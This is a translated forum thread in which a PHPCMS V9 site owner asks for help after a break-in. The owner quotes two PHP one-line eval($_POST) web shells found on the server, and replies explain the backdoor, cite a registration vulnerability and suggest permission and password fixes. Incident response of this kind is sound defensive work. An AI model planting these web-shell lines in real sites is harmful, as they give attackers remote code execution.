Program laman web telah diceroboh oleh Trojan [<?php eval($_POST[1]);?> ok].
伊谢尔伦
伊谢尔伦 2017-06-26 10:48:58
0
5
2533

Tapak web ini sering diserang oleh penggodam baru-baru ini Kami meminta bantuan daripada pakar PHP untuk menjelaskan pemikiran kami supaya kami dapat mencari kelemahan secepat mungkin dan menyelesaikan kebimbangan kami!

Kini kejadian itu digambarkan seperti berikut:

1 Tapak web dibina menggunakan versi lalai PHPCMS_V9_5.20.

2. Semua fail pada mulanya disimpan dalam direktori akar pelayan dengan kebenaran terbuka sepenuhnya.

3 Kemudian, laman web tersebut telah digodam dan fail masukan api.php dan index.php telah ditulis semula.

4 Fail virus yang diimplan ialah: "One Sentence Trojan". Kandungannya adalah seperti berikut:

<?php @eval($_POST['dcs-19']);?>
<?php

5 Selepas menemui masalah, selepas memadamkannya, kunci kebenaran fail tersebut, pemikiran yang akan menyelesaikan masalah. Walau bagaimanapun, beberapa hari kemudian, saya mendapati bahawa gambar laman web telah dirampas, jadi saya menyemak dan membunuh Trojan sekali lagi Keputusan menunjukkan bahawa lokasi fail Trojan berada dalam folder uploadfile20170527 dalam direktori root pelayan. . Fail ini dibuat secara automatik berdasarkan tarikh semasa memuat naik lampiran atau mengemas kini artikel di latar belakang. Bagaimanapun, artikel itu tidak dikemas kini pada 27 Mei, tetapi ia muncul, meminta bantuan daripada pakar untuk menyiasat punca masalah laman web itu.

Kandungan Trojan ialah:

<?php eval($_POST[1]);?>
ok

Lampiran tambahan: Saya menyemak kandungan yang berkaitan di Internet, dan kebanyakan mereka berkata ia adalah serangan suntikan SQL yang disebabkan oleh kelemahan program tapak web Ia dicadangkan untuk membetulkan kelemahan, tetapi bagaimana untuk membetulkannya? Adakah berguna untuk menaik taraf versi PHP dalam talian?

Saya bukan orang teknikal, jadi saya tidak faham banyak perkara Jika anda tidak memahami sesuatu, saya akan mengikut arahan anda dan menambahnya semasa Soal Jawab.

伊谢尔伦
伊谢尔伦

小伙看你根骨奇佳,潜力无限,来学PHP伐。

membalas semua(5)
学霸

Prinsip kod ayat ini sangat mudah POST merujuk kepada data yang dihantar oleh klien, dan eval bermaksud untuk melaksanakan data sebagai kod.
Untuk penggodam, anda hanya perlu memasukkan kod dalam kotak dialog pada halaman web anda, dan ia sebenarnya akan dilaksanakan selepas penyerahan.

Ini hanya satu simptom, iaitu pintu belakang tertinggal akhirnya, tetapi bagaimana penggodam masuk dan meninggalkan pintu belakang Terlalu banyak kemungkinan terdapat kelemahan dalam fungsi muat naik, kata laluan ftp rosak , keistimewaan pentadbir diperolehi, dsb. Akhirnya, meninggalkan Trojan ini hanya untuk kemudahan lain kali.

Perkara paling asas yang perlu anda lakukan ialah memuat turun keseluruhan set kod, semak semua kod dan cari semua tempat yang berkaitan dengan eval Jika ia tidak diperlukan untuk program anda sendiri, uruskan semuanya anda memadamkan satu di sini, mereka akan melakukannya semula di tempat lain, ia tidak berkesudahan. Yang kedua adalah untuk memasangkan celah pengurusan sistem jika ia boleh dikemas kini, menukar semua kata laluan dan menggunakan kata laluan yang kuat secara rawak. . Jika anda terlupa nama, cari sahaja.

Akhirnya, jika ia tidak berfungsi, serahkan kepada profesional untuk melihat sama ada pelaburan itu berbaloi Saya ingat bahawa terdapat laman web asing yang menyediakan perkhidmatan pemantauan dan pemantauan Trojan tahun, yang agak mahal. Saya tidak tahu sama ada terdapat perkhidmatan yang sama di China.

阿神

Notis tentang kelemahan PHPCMS
Pengguna yang dihormati:
Hello!
Kerentanan terkini yang didedahkan dalam program PHPCMS pada bulan April tahun ini boleh menyuntik fail Trojan PHP ke dalam laman web dengan mengubah suai parameter pendaftaran ahli. Melalui ujian syarikat kami, kami mendapati bahawa semasa mendaftar sebagai ahli, PHPCMS akan menyulitkan maklumat pendaftaran dan kemudian menghantarnya ke pelayan untuk pendaftaran ahli Memandangkan kaedah penyulitan tidak boleh dipecahkan buat sementara waktu, syarikat kami tidak boleh memintas pencerobohan penggodam dengan memadankan yang sepadan kata kunci. ;
Pada masa ini terdapat tiga penyelesaian:

  1. Naik taraf kepada program PHPCMS terkini

  2. Tutup fungsi pendaftaran ahli di laman web;

  3. Batalkan kebenaran pelaksanaan direktori muat naik fail (kaedah ini boleh mengelakkan pelaksanaan Trojan, tetapi tidak boleh mengelakkan muat naik fail Trojan
    Selepas melaksanakan mana-mana penyelesaian di atas, sila semak dengan teliti direktori muat naik fail dan subdirektori untuk melihat sama ada ia mengandungi fail PHP); . Direktori ini adalah untuk memuat naik Direktori penjimatan gambar bagi gambar Jika fail PHP ditemui, ia mestilah fail Trojan! Sila padamkannya dengan segera!

Rangkaian Jingan
2017.6.19

给我你的怀抱

Tukar kata laluan pelayan, tukar port lalai SSH, dan tukar pelayan kepada pelayan lain. Bertukar kepada PHPCMS, yang berhenti mengemas kini 5 atau 6 tahun yang lalu. Pasti terdapat banyak kelemahan.

typecho

权限问题, direktori muat naik anda telah mendayakan kebenaran boleh laku.
Penyelesaian kepada masalah ini adalah untuk menghapuskan kelemahan PHPCMS Anda perlu mengalih keluar kebenaran boleh laku bagi direktori semua fail luaran (kod yang tidak ditulis oleh anda atau rangka kerja).

chmod -R 644 upload
滿天的星座

Dua balasan di atas: 你的上传目录开了可执行权限取消uploadfile目录的执行权限
Apakah maksudnya? Saya telah membatalkan kebenaran pelaksanaan direktori, direktori tidak boleh dibuka, dan saya tidak boleh memuat naik gambar jika saya mahu.

Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan